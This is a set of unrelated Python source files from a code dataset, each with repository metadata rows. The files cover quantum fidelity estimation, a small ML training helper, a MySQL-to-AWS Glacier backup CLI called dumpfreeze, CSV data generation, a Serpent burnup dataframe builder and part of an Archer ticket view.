            if not (noise >= 0 and noise <= 1):
                raise ValueError("noise level must be between 0 and 1")
            sigma = depolarizing_channel(rho, p = noise)
        else:
            sigma = depolarizing_channel(rho, p = 0.1)
    else:
        # no noise requested: use an unrelated random mixed state as the "lab" state
        sigma = generate_random_state(n, pure = False, density_matrix = True, flatten = True, isComplex = True, verify = False,\
                                      random_seed = None)
    ### generate the measurement outcomes for the effective (minimax optimal) POVM
    # calculate the normalization factor NF = \sum_i |tr(W_i rho)| over non-identity Paulis
    # computing each Pauli operator individually (as opposed to all at once) is a little slower,
    # but can handle a larger number of qubits
    NF = np.sum([np.abs(np.conj(rho).dot(generate_Pauli_operator(nq = nq, index_list = pauli_index, flatten = True)[0])) for pauli_index in range(1, 4**nq)])
    # if risk is given, choose the number of repetitions to achieve that risk (or a slightly lower one)
    if risk is not None:
        if risk < 0.5:
            R = int(np.ceil(2*np.log(2/epsilon) / np.abs(np.log(1 - (n/NF)**2 * risk**2))))
        else:
            raise ValueError("Only risk < 0.5 can be achieved by choosing appropriate number of repetitions of the minimax optimal measurement.")
    effective_outcomes = generate_sampled_pauli_measurement_outcomes(rho, sigma, R, num_povm_list, epsilon_o, flip_outcomes)
    ### obtain the fidelity estimator
    PSFEM = Pauli_Sampler_Fidelity_Estimation_Manager(n, R, NF, epsilon, epsilon_o, tol)
    fidelity_estimator, risk = PSFEM.find_fidelity_estimator()
    # obtain the estimate
    estimate = fidelity_estimator(effective_outcomes)
    # verify the estimator created for the specialized case using the general approach
    if verify_estimator:
        # the effective POVM for the optimal measurement strategy is
        # {omega_1 rho + omega_2 Delta_rho, (1 - omega_1) rho + (1 - omega_2) Delta_rho},
        # where omega_1 = (n + NF - 1)/2NF, omega_2 = (NF - 1)/2NF, and Delta_rho = I - rho
        omega1 = 0.5 * (n + NF - 1) / NF
        omega2 = 0.5 * (1 - 1/NF)
        Delta_rho = np.eye(2**nq).ravel() - rho
        POVM_list = [[omega1 * rho + omega2 * Delta_rho, (1 - omega1) * rho + (1 - omega2) * Delta_rho]]
        # Juditsky & Nemirovski estimator via the general construction
        FEMC = Fidelity_Estimation_Manager_Corrected(R, epsilon, rho, POVM_list, epsilon_o, tol)
        fidelity_estimator_general, risk_general = FEMC.find_fidelity_estimator()
        # matrices at optimum, pulled back from the real-vector-space embedding
        sigma_1_opt, sigma_2_opt = embed_hermitian_matrix_real_vector_space(FEMC.sigma_1_opt, reverse = True, flatten = True), embed_hermitian_matrix_real_vector_space(FEMC.sigma_2_opt, reverse = True, flatten = True)
        # constraint at optimum
        constraint_general = np.real(np.sum([np.sqrt((np.conj(Ei).dot(sigma_1_opt) + epsilon_o/2)*(np.conj(Ei).dot(sigma_2_opt) + epsilon_o/2)) / (1 + epsilon_o) for Ei in POVM_list[0]]))
    if print_result:
        print("True fidelity", np.real(np.conj(rho).dot(sigma)))
        print("Estimate", estimate)
        print("Risk", risk)
        print("Repetitions", R)
        # print results from the general approach
        if verify_estimator:
            print("Risk (general)", risk_general)
            print("Constraint (general)", constraint_general, "Lower constraint bound", (epsilon / 2)**(1/R))
    if not verify_estimator:
        return PSFEM
    else:
        return (PSFEM, FEMC)
| 59.258457
| 226
| 0.643999
| 6,613
| 43,792
| 4.10313
| 0.109179
| 0.016805
| 0.007297
| 0.00796
| 0.33493
| 0.287131
| 0.24637
| 0.240142
| 0.221678
| 0.200855
| 0
| 0.022914
| 0.264546
| 43,792
| 738
| 227
| 59.338753
| 0.819573
| 0.547794
| 0
| 0.141667
| 0
| 0.020833
| 0.077275
| 0.00117
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.041667
| 0
| 0.145833
| 0.058333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c95c3a9b1e12620c6fdf7ce0fba7e46782237c62
| 2,054
|
py
|
Python
|
until.py
|
zlinao/COMP5212-project1
|
fa6cb10d238de187fbb891499916c6b44a0cd7b7
|
[
"Apache-2.0"
] | 3
|
2018-09-19T11:46:53.000Z
|
2018-10-09T04:48:28.000Z
|
until.py
|
zlinao/COMP5212-project1
|
fa6cb10d238de187fbb891499916c6b44a0cd7b7
|
[
"Apache-2.0"
] | null | null | null |
until.py
|
zlinao/COMP5212-project1
|
fa6cb10d238de187fbb891499916c6b44a0cd7b7
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 28 10:29:52 2018
@author: lin
"""
import numpy as np
import matplotlib.pyplot as plt
def accuracy(x, y, model):
    """Return the fraction of correctly classified samples.

    The model's predicted probabilities are thresholded at 0.5 into hard
    0/1 labels and compared element-wise against the ground-truth labels.

    Args:
        x: feature array forwarded to model.predict.
        y: ground-truth 0/1 label array.
        model: object exposing predict(x, y) -> array of probabilities in [0, 1].

    Returns:
        float in [0, 1]: fraction of predictions matching y.
    """
    probs = np.asarray(model.predict(x, y))
    # threshold without mutating the array returned by model.predict
    # (the original wrote a[a>=0.5]=1 in place, clobbering the model's output buffer)
    preds = np.where(probs >= 0.5, 1, 0)
    return np.sum(preds == y) / len(preds)
# Load the five benchmark datasets as numpy .npz archives (paths relative to the working directory).
# Presumably each archive contains the "train_X"/"train_Y" arrays consumed by run_epoch — confirm
# against the dataset files.
data1 = np.load("datasets/breast-cancer.npz")
data2 = np.load("datasets/diabetes.npz")
data3 = np.load("datasets/digit.npz")
data4 = np.load("datasets/iris.npz")
data5 = np.load("datasets/wine.npz")
def run_epoch(data, model, batch_size, lr):
    """Train `model` for one full pass over the training split and report progress.

    Args:
        data: mapping with "train_X" (2-D feature array) and "train_Y" (label vector).
        model: object exposing train(inputs, labels, lr) -> predicted probabilities
               for the batch, and predict(x, y) (used via accuracy()).
        batch_size: number of samples per minibatch.
        lr: learning rate forwarded to model.train.

    Returns:
        (loss_avg, acc): mean cross-entropy loss per sample, and training accuracy.
    """
    num_samples = len(data["train_X"])
    # ceil division: the original `num_samples//batch_size + 1` dispatched a spurious
    # empty final batch whenever num_samples is an exact multiple of batch_size
    epoch_size = (num_samples + batch_size - 1) // batch_size
    loss_total = 0
    for step in range(epoch_size):
        start = step * batch_size
        # slicing clamps at the array end, so the last (possibly short) batch needs no special case
        input_data = data["train_X"][start:start + batch_size, :]
        labels = data["train_Y"][start:start + batch_size]
        a = model.train(input_data, labels, lr)
        # binary cross-entropy summed over the batch; assumes a stays in (0, 1) — log(0) gives -inf
        loss = -np.sum(labels * np.log(a) + (1 - labels) * np.log(1 - a))
        loss_total += loss
    loss_avg = loss_total / num_samples
    acc = accuracy(data["train_X"], data["train_Y"], model)
    return loss_avg, acc
def plot_loss_acc(loss, acc, i):
    """Plot per-epoch training loss and accuracy for dataset i+1 on two separate figures.

    Figure numbers are 2*i+1 (loss) and 2*i+2 (accuracy), so successive datasets
    never overwrite each other's figures.
    """
    fig_base = 2 * i
    dataset_label = "dataset" + str(i + 1)
    # loss curve on its own figure
    plt.figure(fig_base + 1)
    plt.plot(loss, label='loss per epoch')
    plt.title(dataset_label + " training loss")
    plt.legend()
    plt.xlabel('epoch_num')
    # accuracy curve on the next figure
    plt.figure(fig_base + 2)
    plt.plot(acc, color='orange', label='accuray per epoch')
    plt.title(dataset_label + " training accuracy")
    plt.legend()
    plt.xlabel('epoch_num')
def sigmoid(x):
    """Numerically stable logistic function 1 / (1 + exp(-x)).

    Works on scalars and numpy arrays. Evaluated as exp(-logaddexp(0, -x)),
    which is algebraically identical to 1/(1+exp(-x)) but never overflows:
    the naive form emits a RuntimeWarning and goes through inf for x << 0.
    """
    # log(1 + exp(-x)) computed stably, then exponentiated
    return np.exp(-np.logaddexp(0, -x))
def choose_dataset(choice, config1):
    """Invoke the dataset loader on config1 selected by number and return config1.

    Choices 1-5 map to cancer, diabetes, digit, iris and wine respectively;
    any other choice prints a usage hint and leaves config1 untouched.
    """
    loader_names = {1: 'cancer', 2: 'diabetes', 3: 'digit', 4: 'iris', 5: 'wine'}
    name = loader_names.get(choice)
    if name is None:
        print("please choose the dataset number : 1-5")
    else:
        # only the chosen loader attribute is looked up, mirroring the if/elif chain
        getattr(config1, name)()
    return config1
| 25.358025
| 79
| 0.601266
| 313
| 2,054
| 3.840256
| 0.319489
| 0.0599
| 0.058236
| 0.006656
| 0.227953
| 0.227953
| 0.184692
| 0.168885
| 0.123128
| 0
| 0
| 0.034069
| 0.228335
| 2,054
| 80
| 80
| 25.675
| 0.72429
| 0.055988
| 0
| 0.109091
| 0
| 0
| 0.152411
| 0.024365
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.036364
| 0.018182
| 0.2
| 0.018182
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c960f97df84624c96f4c85fc91f46edd0a467d9e
| 11,996
|
py
|
Python
|
dumpfreeze/main.py
|
rkcf/dumpfreeze
|
e9b18e4bc4574ff3b647a075cecd72977dc8f59a
|
[
"MIT"
] | 1
|
2020-01-30T17:59:50.000Z
|
2020-01-30T17:59:50.000Z
|
dumpfreeze/main.py
|
rkcf/dumpfreeze
|
e9b18e4bc4574ff3b647a075cecd72977dc8f59a
|
[
"MIT"
] | null | null | null |
dumpfreeze/main.py
|
rkcf/dumpfreeze
|
e9b18e4bc4574ff3b647a075cecd72977dc8f59a
|
[
"MIT"
] | null | null | null |
# dumpfreeze
# Create MySQL dumps and backup to Amazon Glacier
import os
import logging
import datetime
import click
import uuid
import sqlalchemy as sa
from dumpfreeze import backup as bak
from dumpfreeze import aws
from dumpfreeze import inventorydb
from dumpfreeze import __version__
logger = logging.getLogger(__name__)
def abort_if_false(ctx, param, value):
    """Click option callback: abort the command unless the confirmation value is truthy."""
    if value:
        return
    ctx.abort()
@click.group()
@click.option('-v', '--verbose', count=True)
@click.option('--local-db', default='~/.dumpfreeze/inventory.db')
@click.version_option(__version__, prog_name='dumpfreeze')
@click.pass_context
def main(ctx, verbose, local_db):
    """ Create and manage MySQL dumps locally and on AWS Glacier """
    # Set logger verbosity: -v => ERROR, -vv => INFO, -vvv => DEBUG; default CRITICAL
    if verbose == 1:
        logging.basicConfig(level=logging.ERROR)
    elif verbose == 2:
        logging.basicConfig(level=logging.INFO)
    elif verbose == 3:
        logging.basicConfig(level=logging.DEBUG)
    else:
        logging.basicConfig(level=logging.CRITICAL)
    # Check if the inventory db exists, if not create it
    expanded_db_path = os.path.expanduser(local_db)
    if not os.path.isfile(expanded_db_path):
        inventorydb.setup_db(expanded_db_path)
    # Create a db session factory and stash it on the click context for subcommands
    db_engine = sa.create_engine('sqlite:///' + expanded_db_path)
    Session = sa.orm.sessionmaker(bind=db_engine)
    ctx.obj['session_maker'] = Session
    return
# Backup operations
@click.group()
@click.pass_context
def backup(ctx):
    """ Operations on local backups """
    # group container only; subcommands (create/upload/restore/delete/list) do the work
    pass
@backup.command('create')
@click.option('--user', default='root', help='Database user')
@click.option('--backup-dir',
              default=os.getcwd(),
              help='Backup storage directory')
@click.argument('database')
@click.pass_context
def create_backup(ctx, database, user, backup_dir):
    """ Create a mysqldump backup"""
    # random UUID identifies this backup both on disk and in the inventory db
    backup_uuid = uuid.uuid4().hex
    try:
        bak.create_dump(database, user, backup_dir, backup_uuid)
    except Exception as e:
        logger.critical(e)
        raise SystemExit(1)
    today = datetime.date.isoformat(datetime.datetime.today())
    # Insert backup info into backup inventory db
    backup_info = inventorydb.Backup(id=backup_uuid,
                                     database_name=database,
                                     backup_dir=backup_dir,
                                     date=today)
    local_db = ctx.obj['session_maker']()
    backup_info.store(local_db)
    # echo the UUID so scripts can capture it
    click.echo(backup_uuid)
@backup.command('upload')
@click.option('--vault', required=True, help='Vault to upload to')
@click.argument('backup_uuid', metavar='UUID')
@click.pass_context
def upload_backup(ctx, vault, backup_uuid):
    """ Upload a local backup dump to AWS Glacier """
    # Get backup info from the inventory db
    local_db = ctx.obj['session_maker']()
    try:
        query = local_db.query(inventorydb.Backup)
        backup_info = query.filter_by(id=backup_uuid).one()
    except Exception as e:
        logger.critical(e)
        local_db.rollback()
        raise SystemExit(1)
    finally:
        local_db.close()
    # Construct backup path
    # NOTE(review): backup_info is read after its session is closed; this relies on the
    # columns having been loaded before close — confirm session expire behavior
    backup_file = backup_info.id + '.sql'
    backup_path = os.path.join(backup_info.backup_dir, backup_file)
    # Upload backup_file to Glacier
    try:
        upload_response = aws.glacier_upload(backup_path, vault)
    except Exception as e:
        logger.critical(e)
        raise SystemExit(1)
    archive_uuid = uuid.uuid4().hex
    # Insert archive info into archive inventory db
    archive_info = inventorydb.Archive(id=archive_uuid,
                                       aws_id=upload_response['archiveId'],
                                       location=upload_response['location'],
                                       vault_name=vault,
                                       database_name=backup_info.database_name,
                                       date=backup_info.date)
    local_db = ctx.obj['session_maker']()
    archive_info.store(local_db)
    # echo the new archive UUID so scripts can capture it
    click.echo(archive_uuid)
@backup.command('restore')
@click.option('--user', default='root', help='Database user')
@click.argument('backup_uuid', metavar='UUID')
@click.pass_context
def restore_backup(ctx, user, backup_uuid):
    """ Restore a backup to the database """
    # Get backup info from the inventory db
    local_db = ctx.obj['session_maker']()
    try:
        query = local_db.query(inventorydb.Backup)
        backup_info = query.filter_by(id=backup_uuid).one()
    except Exception as e:
        logger.critical(e)
        local_db.rollback()
        raise SystemExit(1)
    finally:
        local_db.close()
    # Restore the dump into the original database via the backup module
    bak.restore_dump(backup_info.database_name,
                     user,
                     backup_info.backup_dir,
                     backup_info.id)
@backup.command('delete')
@click.argument('backup_uuid', metavar='UUID')
@click.option('--yes',
              '-y',
              is_flag=True,
              callback=abort_if_false,
              expose_value=False,
              prompt='Delete backup?')
@click.pass_context
def delete_backup(ctx, backup_uuid):
    """ Delete a local dump backup """
    # Get backup info from the inventory db
    local_db = ctx.obj['session_maker']()
    try:
        query = local_db.query(inventorydb.Backup)
        backup_info = query.filter_by(id=backup_uuid).one()
    except Exception as e:
        logger.critical(e)
        local_db.rollback()
        raise SystemExit(1)
    finally:
        local_db.close()
    # Construct backup path
    backup_file = backup_info.id + '.sql'
    backup_path = os.path.join(backup_info.backup_dir, backup_file)
    # Delete the dump file on disk first, then drop the inventory record
    os.remove(backup_path)
    # Remove from db
    local_db = ctx.obj['session_maker']()
    backup_info.delete(local_db)
    click.echo(backup_info.id)
@backup.command('list')
@click.pass_context
def list_backup(ctx):
    """ Return a list of all local backups """
    # Get inventory
    local_db = ctx.obj['session_maker']()
    try:
        backups = local_db.query(inventorydb.Backup).all()
    except Exception as e:
        logger.critical(e)
        local_db.rollback()
        raise SystemExit(1)
    finally:
        local_db.close()
    # collect one row of display strings per backup
    # NOTE(review): the loop variable shadows the 'backup' click group defined above
    formatted = []
    for backup in backups:
        formatted.append([backup.id,
                          backup.database_name,
                          backup.backup_dir,
                          backup.date])
    # Add header row
    formatted.insert(0, ['UUID', 'DATABASE', 'LOCATION', 'DATE'])
    # Column widths: widest cell in each column
    widths = [max(map(len, column)) for column in zip(*formatted)]
    # Print inventory, one aligned row at a time
    for row in formatted:
        print(" ".join((val.ljust(width)
                        for val, width in zip(row, widths))))
# Archive operations
@click.group()
@click.pass_context
def archive(ctx):
""" Operations on AWS Glacier Archives """
pass
@archive.command('delete')
@click.argument('archive_uuid', metavar='UUID')
@click.option('--yes',
              '-y',
              is_flag=True,
              callback=abort_if_false,
              expose_value=False,
              prompt='Delete archive?')
@click.pass_context
def delete_archive(ctx, archive_uuid):
    """ Delete an archive on AWS Glacier """
    # Get archive info from the inventory db
    local_db = ctx.obj['session_maker']()
    try:
        query = local_db.query(inventorydb.Archive)
        archive_info = query.filter_by(id=archive_uuid).one()
    except Exception as e:
        logger.critical(e)
        local_db.rollback()
        raise SystemExit(1)
    finally:
        local_db.close()
    # Send delete job to AWS first, then drop the local record
    aws.delete_archive(archive_info)
    # Remove from db
    local_db = ctx.obj['session_maker']()
    archive_info.delete(local_db)
    click.echo(archive_uuid)
@archive.command('retrieve')
@click.argument('archive_uuid', metavar='UUID')
@click.pass_context
def retrieve_archive(ctx, archive_uuid):
    """ Initiate an archive retrieval from AWS Glacier """
    # Get archive info from the inventory db
    local_db = ctx.obj['session_maker']()
    try:
        query = local_db.query(inventorydb.Archive)
        archive_info = query.filter_by(id=archive_uuid).one()
    except Exception as e:
        logger.critical(e)
        local_db.rollback()
        raise SystemExit(1)
    finally:
        local_db.close()
    # Initiate archive retrieval job (asynchronous on the AWS side)
    job_response = aws.retrieve_archive(archive_info)
    # Record the job so 'poll-jobs' can later detect completion and download the data
    job_info = inventorydb.Job(account_id=job_response[0],
                               vault_name=job_response[1],
                               id=job_response[2])
    local_db = ctx.obj['session_maker']()
    job_info.store(local_db)
@archive.command('list')
@click.pass_context
def list_archive(ctx):
    """ Return a list of uploaded archives """
    # Get inventory
    local_db = ctx.obj['session_maker']()
    try:
        archives = local_db.query(inventorydb.Archive).all()
    except Exception as e:
        logger.critical(e)
        local_db.rollback()
        raise SystemExit(1)
    finally:
        local_db.close()
    # collect one row of display strings per archive
    formatted = []
    for archive in archives:
        formatted.append([archive.id,
                          archive.vault_name,
                          archive.database_name,
                          archive.date])
    # Add header row
    formatted.insert(0, ('UUID', 'VAULT', 'DATABASE', 'DATE'))
    # Column widths: widest cell in each column
    widths = [max(map(len, column)) for column in zip(*formatted)]
    # Print inventory, one aligned row at a time
    for row in formatted:
        print(" ".join((val.ljust(width)
                        for val, width in zip(row, widths))))
@click.command('poll-jobs')
@click.pass_context
def poll_jobs(ctx):
    """ Check each job in job list, check for completion,
    and download job data
    """
    # Get job list from the inventory db
    local_db = ctx.obj['session_maker']()
    try:
        job_list = local_db.query(inventorydb.Job).all()
    except Exception as e:
        logger.critical(e)
        local_db.rollback()
        raise SystemExit(1)
    finally:
        local_db.close()
    # Check each pending retrieval job for completion
    for job in job_list:
        logger.info('Checking job %s for completion', job.id)
        if aws.check_job(job):
            logger.info('Job %s complete, getting data', job.id)
            # Pull the retrieved archive payload
            backup_data = aws.get_archive_data(job)
            # Store the payload as a new local backup file under a fresh UUID
            backup_dir = os.getcwd()
            backup_uuid = uuid.uuid4().hex
            backup_file = backup_uuid + '.sql'
            backup_path = os.path.join(backup_dir, backup_file)
            with open(backup_path, 'w') as f:
                f.write(backup_data)
            # Look up the corresponding archive record to recover metadata
            archive_id = aws.get_job_archive(job)
            local_db = ctx.obj['session_maker']()
            try:
                query = local_db.query(inventorydb.Archive)
                archive_info = query.filter_by(aws_id=archive_id).one()
            except Exception as e:
                logger.critical(e)
                local_db.rollback()
                raise SystemExit(1)
            finally:
                local_db.close()
            database_name = archive_info.database_name
            backup_date = archive_info.date
            # Insert the restored dump into the backup inventory db
            backup_info = inventorydb.Backup(id=backup_uuid,
                                             database_name=database_name,
                                             backup_dir=backup_dir,
                                             date=backup_date)
            local_db = ctx.obj['session_maker']()
            backup_info.store(local_db)
            # Delete the completed job from the db
            local_db = ctx.obj['session_maker']()
            job.delete(local_db)
            click.echo(backup_uuid)
# Attach the command groups/commands to the root CLI group.
main.add_command(backup)
main.add_command(archive)
main.add_command(poll_jobs, name='poll-jobs')
# NOTE(review): invoked unconditionally, so importing this module runs
# the CLI; a `if __name__ == '__main__':` guard would change import
# behavior, so only flagging it here.
main(obj={})
| 29.766749
| 79
| 0.614288
| 1,449
| 11,996
| 4.906832
| 0.135266
| 0.05218
| 0.031083
| 0.043038
| 0.54135
| 0.501266
| 0.481013
| 0.419409
| 0.407032
| 0.372855
| 0
| 0.002541
| 0.278343
| 11,996
| 402
| 80
| 29.840796
| 0.818759
| 0.11879
| 0
| 0.562278
| 0
| 0
| 0.06948
| 0.002488
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046263
| false
| 0.049822
| 0.035587
| 0
| 0.085409
| 0.007117
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c96260912cab6b5833f970ad06a26821cebe5439
| 886
|
py
|
Python
|
01-tapsterbot/click-accuracy/makeTestData.py
|
AppTestBot/AppTestBot
|
035e93e662753e50d7dcc38d6fd362933186983b
|
[
"Apache-2.0"
] | null | null | null |
01-tapsterbot/click-accuracy/makeTestData.py
|
AppTestBot/AppTestBot
|
035e93e662753e50d7dcc38d6fd362933186983b
|
[
"Apache-2.0"
] | null | null | null |
01-tapsterbot/click-accuracy/makeTestData.py
|
AppTestBot/AppTestBot
|
035e93e662753e50d7dcc38d6fd362933186983b
|
[
"Apache-2.0"
] | null | null | null |
import csv
FLAGS = None
def main():
    """Write the grid of test coordinates to dataset/test.csv.

    Emits one ``[h, w]`` row per grid point: w runs from -60 to 60 in
    steps of 7.5 and h from -28 to 26 in steps of 6.75 (153 rows).
    The commented-out FLAGS-based ranges in the original were never
    wired up; the grid is hard-coded.
    """
    # newline='' is required by the csv module so rows are not doubled
    # with blank lines on Windows.
    with open('dataset/test.csv', 'w', newline='') as csv_file:
        writer = csv.writer(csv_file, delimiter=',')
        w = -60
        while w <= 60:
            h = -28
            while h <= 26:
                writer.writerow([h, w])
                h += 6.75
            w = w + 7.5
if __name__ == "__main__":
    import argparse
    # CLI flags are parsed but currently unused by main(), which relies
    # on a hard-coded grid (see the commented-out FLAGS loops above).
    parser = argparse.ArgumentParser(description='make coordinate.csv for data')
    parser.add_argument('--width', '-w', type=int,
                        required=False,
                        help='input width')
    parser.add_argument('--height', '-t', type=int,
                        required=False,
                        help='input height')
    FLAGS = parser.parse_args()
    main()
| 28.580645
| 80
| 0.497743
| 103
| 886
| 4.15534
| 0.504854
| 0.03271
| 0.056075
| 0.093458
| 0.135514
| 0.135514
| 0
| 0
| 0
| 0
| 0
| 0.026738
| 0.366817
| 886
| 30
| 81
| 29.533333
| 0.736185
| 0.102709
| 0
| 0.086957
| 0
| 0
| 0.121212
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0.086957
| 0
| 0.130435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c96277ac68a88dc09c944967b21d05e1368096d4
| 3,546
|
py
|
Python
|
CreateBigDataFrame.py
|
ezsolti/MVA_PWR_data
|
3e64c5b1bd643d5ba5d6e275b426d601cff7b270
|
[
"MIT"
] | 2
|
2022-02-04T10:47:37.000Z
|
2022-03-15T13:03:19.000Z
|
CreateBigDataFrame.py
|
ezsolti/MVA_PWR_data
|
3e64c5b1bd643d5ba5d6e275b426d601cff7b270
|
[
"MIT"
] | null | null | null |
CreateBigDataFrame.py
|
ezsolti/MVA_PWR_data
|
3e64c5b1bd643d5ba5d6e275b426d601cff7b270
|
[
"MIT"
] | 1
|
2022-01-13T15:55:17.000Z
|
2022-01-13T15:55:17.000Z
|
"""
Script to create dataframe from serpent bumat files
including all the nuclides.
Zsolt Elter 2019
"""
import json
import os
# Nuclide-key -> column-identifier lookup used to build the dataframe
# header and per-row columns below.
with open ('nuclides.json') as json_file:
    nuclidesDict = json.load(json_file)
#final name of the file
dataFrame='PWR_UOX-MOX_BigDataFrame-SF-GSRC-noReactorType.csv'
def readInventory(filename):
    """Read a Serpent bumat file into an inventory dict.

    Parameter
    ---------
    filename : str
        path to the bumatfile to be read

    Returns
    -------
    inventory : dict
        dictionary to store the inventory. keys are ZAID identifiers
        (str, with the trailing 4-character library suffix such as
        '.09c' stripped), values are atom densities (str) in
        b^{-1}cm^{-1}
    """
    inventory = {}
    # The first 6 lines are header material; entries follow as
    # "<ZAID><suffix> <atom density>" token pairs.
    with open(filename) as mat:
        for line in mat.readlines()[6:]:
            tokens = line.strip().split()
            if not tokens:
                # tolerate blank/trailing lines
                continue
            inventory[tokens[0][:-4]] = tokens[1]
    return inventory
# Build the CSV row by row.  NOTE(review): the name `csv` below shadows
# the stdlib csv module (not imported here, so harmless, but worth
# renaming if csv is ever needed).
#header of file
dataFrameStr=',BU,CT,IE,fuelType,TOT_SF,TOT_GSRC,TOT_A,TOT_H'
for nuclIDi in nuclidesDict.values():
    dataFrameStr=dataFrameStr+',%s'%nuclIDi #here we add the nuclide identifier to the header!
dataFrameStr=dataFrameStr+'\n'
#header ends
f = open(dataFrame,'w')
f.write(dataFrameStr)
f.close()
#let's open the file linking to the outputs
csv=open('file_log_PWR_UOX-MOX.csv').readlines()
depfileOld=''
for line in csv[1:]:
    x=line.strip().split(',')
    ####SFRATE AND GSRC
    if x[4]=='UOX':
        deppath='/UOX/serpent_files/' #since originally I have not included a link to the _dep.m file, here I had to fix that
        depfileNew='%s/IE%d/BU%d/sPWR_IE_%d_BU_%d_dep.m'%(deppath,10*float(x[3]),10*float(x[1]),10*float(x[3]),10*float(x[1])) #and find out from the BIC parameters
    else: #the path to the _dep.m file...
        deppath='/MOX/serpent_files/'
        depfileNew='%s/IE%d/BU%d/sPWR_MOX_IE_%d_BU_%d_dep.m'%(deppath,10*float(x[3]),10*float(x[1]),10*float(x[3]),10*float(x[1]))
    if depfileNew != depfileOld: #of course there is one _dep.m file for all the CT's for a given BU-IE, so we keep track what to open. And we only do it once
        #things we grep here are lists!
        TOTSFs=os.popen('grep TOT_SF %s -A 2'%depfileNew).readlines()[2].strip().split() #not the most time efficient greping, but does the job
        TOTGSRCs=os.popen('grep TOT_GSRC %s -A 2'%depfileNew).readlines()[2].strip().split()
        TOTAs=os.popen('grep "TOT_A =" %s -A 2'%depfileNew).readlines()[2].strip().split() #TOT_A in itself matches TOT_ADENS, that is why we need "" around it
        TOTHs=os.popen('grep "TOT_H" %s -A 2'%depfileNew).readlines()[2].strip().split() if False else os.popen('grep TOT_H %s -A 2'%depfileNew).readlines()[2].strip().split()
        depfileOld=depfileNew
    else:
        depfileOld=depfileNew
    ####
    inv=readInventory(x[-1]) #extract inventory from the outputfile
    idx=int(x[-1][x[-1].find('bumat')+5:]) #get an index, since we want to know which value from the list to take
    totsf=TOTSFs[idx]
    totgsrc=TOTGSRCs[idx]
    tota=TOTAs[idx]
    toth=TOTHs[idx]
    #we make a big string for the entry, storing all the columns
    newentry=x[0]+','+x[1]+','+x[2]+','+x[3]+','+x[4]+','+totsf+','+totgsrc+','+tota+','+toth
    for nucli in nuclidesDict.keys():
        newentry=newentry+',%s'%(inv[nucli])
    newentry=newentry+'\n'
    #entry is created, so we append
    f = open(dataFrame,'a')
    f.write(newentry)
    f.close()
    #and we print just to see where is the process at.
    if int(x[0])%1000==0:
        print(x[0])
| 35.818182
| 164
| 0.620135
| 544
| 3,546
| 3.981618
| 0.363971
| 0.00831
| 0.029548
| 0.01108
| 0.141274
| 0.129271
| 0.129271
| 0.10988
| 0.048938
| 0.048938
| 0
| 0.02197
| 0.229836
| 3,546
| 98
| 165
| 36.183673
| 0.771146
| 0.335871
| 0
| 0.111111
| 0
| 0
| 0.156085
| 0.085538
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018519
| false
| 0
| 0.037037
| 0
| 0.074074
| 0.018519
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c965792691ce7606e38e36d2ae95ee8c42d4351b
| 2,953
|
py
|
Python
|
archer_views.py
|
splunk-soar-connectors/archer
|
65b9a5e9e250b6407e3aad08b86a483499a6210f
|
[
"Apache-2.0"
] | null | null | null |
archer_views.py
|
splunk-soar-connectors/archer
|
65b9a5e9e250b6407e3aad08b86a483499a6210f
|
[
"Apache-2.0"
] | 1
|
2022-02-08T22:54:54.000Z
|
2022-02-08T22:54:54.000Z
|
archer_views.py
|
splunk-soar-connectors/archer
|
65b9a5e9e250b6407e3aad08b86a483499a6210f
|
[
"Apache-2.0"
] | null | null | null |
# File: archer_views.py
#
# Copyright (c) 2016-2022 Splunk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
def get_ticket(provides, all_results, context):
    """Build the render context for the get_ticket view.

    Populates ``context['results']`` with one entry per action result:
    its parameters (minus the internal 'context' key), the first
    record's field list sorted by field name when data is present, and
    the content id reported by the action summary.  Returns the name of
    the template to render.
    """
    entries = []
    context['results'] = entries
    for summary, action_results in all_results:
        for result in action_results:
            params = result.get_param()
            # Drop the framework-internal 'context' parameter before display.
            params.pop('context', None)
            entry = {'parameters': params}
            data = result.get_data()
            if data:
                fields = data[0]['Record']['Field']
                # Sort by field name, with None names first.
                entry['record'] = sorted(
